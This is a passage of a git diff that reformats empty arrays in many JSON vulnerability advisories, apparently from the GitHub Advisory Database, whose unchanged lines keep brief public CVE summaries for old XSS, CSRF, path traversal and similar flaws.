+++ b/advisories/unreviewed/2022/05/GHSA-v5qg-36wv-7qpm/GHSA-v5qg-36wv-7qpm.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-v6fx-3qcr-2mfg/GHSA-v6fx-3qcr-2mfg.json b/advisories/unreviewed/2022/05/GHSA-v6fx-3qcr-2mfg/GHSA-v6fx-3qcr-2mfg.json
index 6839d8e24da..e39e840176f 100644
--- a/advisories/unreviewed/2022/05/GHSA-v6fx-3qcr-2mfg/GHSA-v6fx-3qcr-2mfg.json
+++ b/advisories/unreviewed/2022/05/GHSA-v6fx-3qcr-2mfg/GHSA-v6fx-3qcr-2mfg.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-v824-6qgw-5mhr/GHSA-v824-6qgw-5mhr.json b/advisories/unreviewed/2022/05/GHSA-v824-6qgw-5mhr/GHSA-v824-6qgw-5mhr.json
index 2442b159e01..0e1546453c7 100644
--- a/advisories/unreviewed/2022/05/GHSA-v824-6qgw-5mhr/GHSA-v824-6qgw-5mhr.json
+++ b/advisories/unreviewed/2022/05/GHSA-v824-6qgw-5mhr/GHSA-v824-6qgw-5mhr.json
@@ -7,12 +7,8 @@
"CVE-2014-0327"
],
"details": "The Terminal Upgrade Tool in the Pilot Below Deck Equipment (BDE) and OpenPort implementations on Iridium satellite terminals allows remote attackers to execute arbitrary code by uploading new firmware to TCP port 54321.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -24,9 +20,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-v83p-2pcp-wwg6/GHSA-v83p-2pcp-wwg6.json b/advisories/unreviewed/2022/05/GHSA-v83p-2pcp-wwg6/GHSA-v83p-2pcp-wwg6.json
index 139916af809..f089bfc0a5e 100644
--- a/advisories/unreviewed/2022/05/GHSA-v83p-2pcp-wwg6/GHSA-v83p-2pcp-wwg6.json
+++ b/advisories/unreviewed/2022/05/GHSA-v83p-2pcp-wwg6/GHSA-v83p-2pcp-wwg6.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-vg9w-vcgp-9r7c/GHSA-vg9w-vcgp-9r7c.json b/advisories/unreviewed/2022/05/GHSA-vg9w-vcgp-9r7c/GHSA-vg9w-vcgp-9r7c.json
index fdafcc9ef65..e2474ab4629 100644
--- a/advisories/unreviewed/2022/05/GHSA-vg9w-vcgp-9r7c/GHSA-vg9w-vcgp-9r7c.json
+++ b/advisories/unreviewed/2022/05/GHSA-vg9w-vcgp-9r7c/GHSA-vg9w-vcgp-9r7c.json
@@ -7,12 +7,8 @@
"CVE-2014-3908"
],
"details": "The Amazon.com Kindle application before 4.5.0 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -28,9 +24,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-vv4r-292w-968p/GHSA-vv4r-292w-968p.json b/advisories/unreviewed/2022/05/GHSA-vv4r-292w-968p/GHSA-vv4r-292w-968p.json
index 55c5cae35de..8b423fe9bbd 100644
--- a/advisories/unreviewed/2022/05/GHSA-vv4r-292w-968p/GHSA-vv4r-292w-968p.json
+++ b/advisories/unreviewed/2022/05/GHSA-vv4r-292w-968p/GHSA-vv4r-292w-968p.json
@@ -7,12 +7,8 @@
"CVE-2014-2380"
],
"details": "Schneider Electric Wonderware Information Server (WIS) Portal 4.0 SP1 through 5.5 uses weak encryption, which allows remote attackers to obtain sensitive information by reading a credential file.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -24,9 +20,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-vv8p-q8m8-pw8m/GHSA-vv8p-q8m8-pw8m.json b/advisories/unreviewed/2022/05/GHSA-vv8p-q8m8-pw8m/GHSA-vv8p-q8m8-pw8m.json
index 122e38f0430..0d59dd3a32c 100644
--- a/advisories/unreviewed/2022/05/GHSA-vv8p-q8m8-pw8m/GHSA-vv8p-q8m8-pw8m.json
+++ b/advisories/unreviewed/2022/05/GHSA-vv8p-q8m8-pw8m/GHSA-vv8p-q8m8-pw8m.json
@@ -7,12 +7,8 @@
"CVE-2013-5757"
],
"details": "Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-vw3x-5825-83ph/GHSA-vw3x-5825-83ph.json b/advisories/unreviewed/2022/05/GHSA-vw3x-5825-83ph/GHSA-vw3x-5825-83ph.json
index a1b65b60394..d88e527797c 100644
--- a/advisories/unreviewed/2022/05/GHSA-vw3x-5825-83ph/GHSA-vw3x-5825-83ph.json
+++ b/advisories/unreviewed/2022/05/GHSA-vw3x-5825-83ph/GHSA-vw3x-5825-83ph.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-w2fx-qxhw-34qh/GHSA-w2fx-qxhw-34qh.json b/advisories/unreviewed/2022/05/GHSA-w2fx-qxhw-34qh/GHSA-w2fx-qxhw-34qh.json
index a329ab169fc..044678d32a7 100644
--- a/advisories/unreviewed/2022/05/GHSA-w2fx-qxhw-34qh/GHSA-w2fx-qxhw-34qh.json
+++ b/advisories/unreviewed/2022/05/GHSA-w2fx-qxhw-34qh/GHSA-w2fx-qxhw-34qh.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-w2qp-8fj2-5g53/GHSA-w2qp-8fj2-5g53.json b/advisories/unreviewed/2022/05/GHSA-w2qp-8fj2-5g53/GHSA-w2qp-8fj2-5g53.json
index d0fec30ceaa..e125592d568 100644
--- a/advisories/unreviewed/2022/05/GHSA-w2qp-8fj2-5g53/GHSA-w2qp-8fj2-5g53.json
+++ b/advisories/unreviewed/2022/05/GHSA-w2qp-8fj2-5g53/GHSA-w2qp-8fj2-5g53.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-w2xp-xx6c-j982/GHSA-w2xp-xx6c-j982.json b/advisories/unreviewed/2022/05/GHSA-w2xp-xx6c-j982/GHSA-w2xp-xx6c-j982.json
index 222af21aa0e..b921b2c930b 100644
--- a/advisories/unreviewed/2022/05/GHSA-w2xp-xx6c-j982/GHSA-w2xp-xx6c-j982.json
+++ b/advisories/unreviewed/2022/05/GHSA-w2xp-xx6c-j982/GHSA-w2xp-xx6c-j982.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-w35x-xjwx-xg6c/GHSA-w35x-xjwx-xg6c.json b/advisories/unreviewed/2022/05/GHSA-w35x-xjwx-xg6c/GHSA-w35x-xjwx-xg6c.json
index 6a4d97972cd..7c730de03db 100644
--- a/advisories/unreviewed/2022/05/GHSA-w35x-xjwx-xg6c/GHSA-w35x-xjwx-xg6c.json
+++ b/advisories/unreviewed/2022/05/GHSA-w35x-xjwx-xg6c/GHSA-w35x-xjwx-xg6c.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-w8q5-pmp2-g5pv/GHSA-w8q5-pmp2-g5pv.json b/advisories/unreviewed/2022/05/GHSA-w8q5-pmp2-g5pv/GHSA-w8q5-pmp2-g5pv.json
index d98c3501e5f..b7514e0b3ad 100644
--- a/advisories/unreviewed/2022/05/GHSA-w8q5-pmp2-g5pv/GHSA-w8q5-pmp2-g5pv.json
+++ b/advisories/unreviewed/2022/05/GHSA-w8q5-pmp2-g5pv/GHSA-w8q5-pmp2-g5pv.json
@@ -7,12 +7,8 @@
"CVE-2014-4937"
],
"details": "Directory traversal vulnerability in includes/bookx_export.php BookX plugin 1.7 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-w975-jcxc-99vr/GHSA-w975-jcxc-99vr.json b/advisories/unreviewed/2022/05/GHSA-w975-jcxc-99vr/GHSA-w975-jcxc-99vr.json
index 8386373a686..3f74175b64b 100644
--- a/advisories/unreviewed/2022/05/GHSA-w975-jcxc-99vr/GHSA-w975-jcxc-99vr.json
+++ b/advisories/unreviewed/2022/05/GHSA-w975-jcxc-99vr/GHSA-w975-jcxc-99vr.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-wcx9-9c9g-9jrf/GHSA-wcx9-9c9g-9jrf.json b/advisories/unreviewed/2022/05/GHSA-wcx9-9c9g-9jrf/GHSA-wcx9-9c9g-9jrf.json
index f6ce9d9bdcc..3e02553bc74 100644
--- a/advisories/unreviewed/2022/05/GHSA-wcx9-9c9g-9jrf/GHSA-wcx9-9c9g-9jrf.json
+++ b/advisories/unreviewed/2022/05/GHSA-wcx9-9c9g-9jrf/GHSA-wcx9-9c9g-9jrf.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-wf33-4wr2-2h52/GHSA-wf33-4wr2-2h52.json b/advisories/unreviewed/2022/05/GHSA-wf33-4wr2-2h52/GHSA-wf33-4wr2-2h52.json
index 9d39ef48ba2..3c0dadb9751 100644
--- a/advisories/unreviewed/2022/05/GHSA-wf33-4wr2-2h52/GHSA-wf33-4wr2-2h52.json
+++ b/advisories/unreviewed/2022/05/GHSA-wf33-4wr2-2h52/GHSA-wf33-4wr2-2h52.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-wg3j-j4rh-6353/GHSA-wg3j-j4rh-6353.json b/advisories/unreviewed/2022/05/GHSA-wg3j-j4rh-6353/GHSA-wg3j-j4rh-6353.json
index bbd02a2f53b..de388ae8cb1 100644
--- a/advisories/unreviewed/2022/05/GHSA-wg3j-j4rh-6353/GHSA-wg3j-j4rh-6353.json
+++ b/advisories/unreviewed/2022/05/GHSA-wg3j-j4rh-6353/GHSA-wg3j-j4rh-6353.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-wgvf-wh5w-rhm5/GHSA-wgvf-wh5w-rhm5.json b/advisories/unreviewed/2022/05/GHSA-wgvf-wh5w-rhm5/GHSA-wgvf-wh5w-rhm5.json
index 08cec9bf2be..20739700179 100644
--- a/advisories/unreviewed/2022/05/GHSA-wgvf-wh5w-rhm5/GHSA-wgvf-wh5w-rhm5.json
+++ b/advisories/unreviewed/2022/05/GHSA-wgvf-wh5w-rhm5/GHSA-wgvf-wh5w-rhm5.json
@@ -7,12 +7,8 @@
"CVE-2014-1474"
],
"details": "Algorithmic complexity vulnerability in Email::Address::List before 0.02, as used in RT 4.2.0 through 4.2.2, allows remote attackers to cause a denial of service (CPU consumption) via a string without an address.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -32,9 +28,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-whcg-w8gv-22hp/GHSA-whcg-w8gv-22hp.json b/advisories/unreviewed/2022/05/GHSA-whcg-w8gv-22hp/GHSA-whcg-w8gv-22hp.json
index fa476a44413..8859b2c7f6f 100644
--- a/advisories/unreviewed/2022/05/GHSA-whcg-w8gv-22hp/GHSA-whcg-w8gv-22hp.json
+++ b/advisories/unreviewed/2022/05/GHSA-whcg-w8gv-22hp/GHSA-whcg-w8gv-22hp.json
@@ -7,12 +7,8 @@
"CVE-2014-4614"
],
"details": "Multiple cross-site request forgery (CSRF) vulnerabilities in Piwigo before 2.6.2 allow remote attackers to hijack the authentication of administrators for requests that use the (1) pwg.groups.addUser, (2) pwg.groups.deleteUser, (3) pwg.groups.setInfo, (4) pwg.users.setInfo, (5) pwg.permissions.add, or (6) pwg.permissions.remove method.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-whqq-6mqg-99x7/GHSA-whqq-6mqg-99x7.json b/advisories/unreviewed/2022/05/GHSA-whqq-6mqg-99x7/GHSA-whqq-6mqg-99x7.json
index eb12d3819bb..ac3a5badee7 100644
--- a/advisories/unreviewed/2022/05/GHSA-whqq-6mqg-99x7/GHSA-whqq-6mqg-99x7.json
+++ b/advisories/unreviewed/2022/05/GHSA-whqq-6mqg-99x7/GHSA-whqq-6mqg-99x7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-wm66-6h3v-p7mr/GHSA-wm66-6h3v-p7mr.json b/advisories/unreviewed/2022/05/GHSA-wm66-6h3v-p7mr/GHSA-wm66-6h3v-p7mr.json
index dac3d6487c0..67832a78db7 100644
--- a/advisories/unreviewed/2022/05/GHSA-wm66-6h3v-p7mr/GHSA-wm66-6h3v-p7mr.json
+++ b/advisories/unreviewed/2022/05/GHSA-wm66-6h3v-p7mr/GHSA-wm66-6h3v-p7mr.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-wm7w-8wm5-6w7j/GHSA-wm7w-8wm5-6w7j.json b/advisories/unreviewed/2022/05/GHSA-wm7w-8wm5-6w7j/GHSA-wm7w-8wm5-6w7j.json
index 3fd5cd7f9ac..5439dc0ee8e 100644
--- a/advisories/unreviewed/2022/05/GHSA-wm7w-8wm5-6w7j/GHSA-wm7w-8wm5-6w7j.json
+++ b/advisories/unreviewed/2022/05/GHSA-wm7w-8wm5-6w7j/GHSA-wm7w-8wm5-6w7j.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-wv36-9cfh-hqgr/GHSA-wv36-9cfh-hqgr.json b/advisories/unreviewed/2022/05/GHSA-wv36-9cfh-hqgr/GHSA-wv36-9cfh-hqgr.json
index 4ff29ab0396..66b9a551912 100644
--- a/advisories/unreviewed/2022/05/GHSA-wv36-9cfh-hqgr/GHSA-wv36-9cfh-hqgr.json
+++ b/advisories/unreviewed/2022/05/GHSA-wv36-9cfh-hqgr/GHSA-wv36-9cfh-hqgr.json
@@ -7,12 +7,8 @@
"CVE-2014-4718"
],
"details": "Multiple cross-site request forgery (CSRF) vulnerabilities in Lunar CMS before 3.3-3 allow remote attackers to hijack the authentication of administrators for requests that (1) add Super users via a request to admin/user_create.php or conduct cross-site scripting (XSS) attacks via the (2) email or (3) subject parameter in contact_form.ext.php to admin/extensions.php.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-wv3q-r7hq-7g23/GHSA-wv3q-r7hq-7g23.json b/advisories/unreviewed/2022/05/GHSA-wv3q-r7hq-7g23/GHSA-wv3q-r7hq-7g23.json
index a8e07ec6892..d846620fc9f 100644
--- a/advisories/unreviewed/2022/05/GHSA-wv3q-r7hq-7g23/GHSA-wv3q-r7hq-7g23.json
+++ b/advisories/unreviewed/2022/05/GHSA-wv3q-r7hq-7g23/GHSA-wv3q-r7hq-7g23.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-ww6h-7hc8-mm6x/GHSA-ww6h-7hc8-mm6x.json b/advisories/unreviewed/2022/05/GHSA-ww6h-7hc8-mm6x/GHSA-ww6h-7hc8-mm6x.json
index e970b331fc2..42926125536 100644
--- a/advisories/unreviewed/2022/05/GHSA-ww6h-7hc8-mm6x/GHSA-ww6h-7hc8-mm6x.json
+++ b/advisories/unreviewed/2022/05/GHSA-ww6h-7hc8-mm6x/GHSA-ww6h-7hc8-mm6x.json
@@ -7,12 +7,8 @@
"CVE-2014-4195"
],
"details": "Cross-site scripting (XSS) vulnerability in zero_view_article.php in ZeroCMS 1.0 allows remote attackers to inject arbitrary web script or HTML via the article_id parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-wwrq-c42j-whw3/GHSA-wwrq-c42j-whw3.json b/advisories/unreviewed/2022/05/GHSA-wwrq-c42j-whw3/GHSA-wwrq-c42j-whw3.json
index 300d213ba53..8db465d39f5 100644
--- a/advisories/unreviewed/2022/05/GHSA-wwrq-c42j-whw3/GHSA-wwrq-c42j-whw3.json
+++ b/advisories/unreviewed/2022/05/GHSA-wwrq-c42j-whw3/GHSA-wwrq-c42j-whw3.json
@@ -7,12 +7,8 @@
"CVE-2014-4526"
],
"details": "Multiple cross-site scripting (XSS) vulnerabilities in callback.php in the efence plugin 1.3.2 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) message, (2) zoneid, (3) pubKey, or (4) privKey parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-www7-pq67-9w24/GHSA-www7-pq67-9w24.json b/advisories/unreviewed/2022/05/GHSA-www7-pq67-9w24/GHSA-www7-pq67-9w24.json
index f280972f633..6235647efdc 100644
--- a/advisories/unreviewed/2022/05/GHSA-www7-pq67-9w24/GHSA-www7-pq67-9w24.json
+++ b/advisories/unreviewed/2022/05/GHSA-www7-pq67-9w24/GHSA-www7-pq67-9w24.json
@@ -7,12 +7,8 @@
"CVE-2007-6388"
],
"details": "Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-wx5g-hmg5-85r4/GHSA-wx5g-hmg5-85r4.json b/advisories/unreviewed/2022/05/GHSA-wx5g-hmg5-85r4/GHSA-wx5g-hmg5-85r4.json
index f5c7d7ce499..0d9be486e14 100644
--- a/advisories/unreviewed/2022/05/GHSA-wx5g-hmg5-85r4/GHSA-wx5g-hmg5-85r4.json
+++ b/advisories/unreviewed/2022/05/GHSA-wx5g-hmg5-85r4/GHSA-wx5g-hmg5-85r4.json
@@ -7,12 +7,8 @@
"CVE-2014-4552"
],
"details": "Cross-site scripting (XSS) vulnerability in library/includes/payment/paypalexpress/DoDirectPayment.php in the Spotlight (spotlightyour) plugin 4.7 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the paymentType parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-wxfr-9v84-73vc/GHSA-wxfr-9v84-73vc.json b/advisories/unreviewed/2022/05/GHSA-wxfr-9v84-73vc/GHSA-wxfr-9v84-73vc.json
index e8f3e5c01ba..5d508639b8f 100644
--- a/advisories/unreviewed/2022/05/GHSA-wxfr-9v84-73vc/GHSA-wxfr-9v84-73vc.json
+++ b/advisories/unreviewed/2022/05/GHSA-wxfr-9v84-73vc/GHSA-wxfr-9v84-73vc.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-x2p4-62mh-gpm4/GHSA-x2p4-62mh-gpm4.json b/advisories/unreviewed/2022/05/GHSA-x2p4-62mh-gpm4/GHSA-x2p4-62mh-gpm4.json
index dc106275eb5..cd218aa6189 100644
--- a/advisories/unreviewed/2022/05/GHSA-x2p4-62mh-gpm4/GHSA-x2p4-62mh-gpm4.json
+++ b/advisories/unreviewed/2022/05/GHSA-x2p4-62mh-gpm4/GHSA-x2p4-62mh-gpm4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-x3mv-945f-xggr/GHSA-x3mv-945f-xggr.json b/advisories/unreviewed/2022/05/GHSA-x3mv-945f-xggr/GHSA-x3mv-945f-xggr.json
index 07f25577ef2..0d6ebfbd90a 100644
--- a/advisories/unreviewed/2022/05/GHSA-x3mv-945f-xggr/GHSA-x3mv-945f-xggr.json
+++ b/advisories/unreviewed/2022/05/GHSA-x3mv-945f-xggr/GHSA-x3mv-945f-xggr.json
@@ -7,12 +7,8 @@
"CVE-2014-1957"
],
"details": "FortiGuard FortiWeb before 5.0.3 allows remote authenticated users to gain privileges via unspecified vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -24,9 +20,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-x3v3-hrc8-35v4/GHSA-x3v3-hrc8-35v4.json b/advisories/unreviewed/2022/05/GHSA-x3v3-hrc8-35v4/GHSA-x3v3-hrc8-35v4.json
index 7e90d54e07c..5e73bad841c 100644
--- a/advisories/unreviewed/2022/05/GHSA-x3v3-hrc8-35v4/GHSA-x3v3-hrc8-35v4.json
+++ b/advisories/unreviewed/2022/05/GHSA-x3v3-hrc8-35v4/GHSA-x3v3-hrc8-35v4.json
@@ -7,12 +7,8 @@
"CVE-2014-4531"
],
"details": "Cross-site scripting (XSS) vulnerability in main_page.php in the Game tabs plugin 0.4.0 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the n parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-x463-hcrq-3f9v/GHSA-x463-hcrq-3f9v.json b/advisories/unreviewed/2022/05/GHSA-x463-hcrq-3f9v/GHSA-x463-hcrq-3f9v.json
index 394137fc36e..efc687d031d 100644
--- a/advisories/unreviewed/2022/05/GHSA-x463-hcrq-3f9v/GHSA-x463-hcrq-3f9v.json
+++ b/advisories/unreviewed/2022/05/GHSA-x463-hcrq-3f9v/GHSA-x463-hcrq-3f9v.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-x4qq-4jc6-hr2v/GHSA-x4qq-4jc6-hr2v.json b/advisories/unreviewed/2022/05/GHSA-x4qq-4jc6-hr2v/GHSA-x4qq-4jc6-hr2v.json
index 5d299ecb12e..01c6b0d8168 100644
--- a/advisories/unreviewed/2022/05/GHSA-x4qq-4jc6-hr2v/GHSA-x4qq-4jc6-hr2v.json
+++ b/advisories/unreviewed/2022/05/GHSA-x4qq-4jc6-hr2v/GHSA-x4qq-4jc6-hr2v.json
@@ -7,12 +7,8 @@
"CVE-2014-4907"
],
"details": "Cross-site scripting (XSS) vulnerability in share/pnp/application/views/kohana_error_page.php in PNP4Nagios before 0.6.22 allows remote attackers to inject arbitrary web script or HTML via a parameter that is not properly handled in an error message.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-x52g-gw6g-wpp2/GHSA-x52g-gw6g-wpp2.json b/advisories/unreviewed/2022/05/GHSA-x52g-gw6g-wpp2/GHSA-x52g-gw6g-wpp2.json
index 65ae3126b23..82cae563124 100644
--- a/advisories/unreviewed/2022/05/GHSA-x52g-gw6g-wpp2/GHSA-x52g-gw6g-wpp2.json
+++ b/advisories/unreviewed/2022/05/GHSA-x52g-gw6g-wpp2/GHSA-x52g-gw6g-wpp2.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-x53g-gcp2-fp24/GHSA-x53g-gcp2-fp24.json b/advisories/unreviewed/2022/05/GHSA-x53g-gcp2-fp24/GHSA-x53g-gcp2-fp24.json
index 69a05f7e664..1c80a1b0aab 100644
--- a/advisories/unreviewed/2022/05/GHSA-x53g-gcp2-fp24/GHSA-x53g-gcp2-fp24.json
+++ b/advisories/unreviewed/2022/05/GHSA-x53g-gcp2-fp24/GHSA-x53g-gcp2-fp24.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-x56p-g9cg-x43w/GHSA-x56p-g9cg-x43w.json b/advisories/unreviewed/2022/05/GHSA-x56p-g9cg-x43w/GHSA-x56p-g9cg-x43w.json
index 4f96796667c..b16494f2079 100644
--- a/advisories/unreviewed/2022/05/GHSA-x56p-g9cg-x43w/GHSA-x56p-g9cg-x43w.json
